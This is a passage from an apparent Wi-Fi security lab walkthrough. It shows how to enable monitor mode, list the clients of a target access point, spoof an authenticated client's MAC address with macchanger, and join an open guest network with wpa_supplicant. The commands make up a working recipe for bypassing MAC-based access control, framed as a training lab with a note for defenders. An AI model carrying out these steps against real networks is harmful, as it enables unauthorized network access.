# Setup monitor mode
# `check kill` stops services that interfere with monitor mode (typically
# NetworkManager and wpa_supplicant), so normal Wi-Fi connectivity on this
# host is lost until those services are restarted.
sudo airmon-ng check kill
# Puts wlan0 into monitor mode; the scan command below addresses the
# resulting monitor interface as wlan0mon.
sudo airmon-ng start wlan0
# Scan for nearby networks and APs
sudo airodump-ng wlan0mon
2. Find authenticated clients
# Limit the capture to a single AP (--bssid) on channel 6 (-c); the station
# list in the output shows the clients associated with that AP.
sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6
3. Change our own MAC address to the MAC address of an authenticated client
# The interface is taken down while its MAC address is changed, then brought
# back up. wlan2 is a separate interface from the monitor-mode wlan0mon.
# These commands need root (no sudo here; the prompt further down is a root shell).
# Defender's takeaway: an access check keyed only on the client MAC address
# is not authentication, because that address is visible to any nearby listener.
ip link set wlan2 down
# -m sets the given MAC address on wlan2.
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
Once we know the ESSID, we can connect to the network. To do that, we create a “free.conf” file so that we can connect from bash using “wpa_supplicant”.
root@WiFiChallengeLab:~# cat free.conf
# wpa_supplicant network block for the open guest network.
network={
ssid="wifi-guest"
# key_mgmt=NONE: no WPA key management is used; with no WEP key configured
# the link is unencrypted, so traffic on it is readable by nearby listeners.
key_mgmt=NONE
# scan_ssid=1: scan with SSID-specific Probe Request frames, which is needed
# to find APs that do not answer broadcast-SSID probes (hidden SSIDs).
scan_ssid=1
}
# -D selects the nl80211 driver backend, -i the interface, -c the config file.
# Without -B the process stays in the foreground and logs association
# progress to the terminal.
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf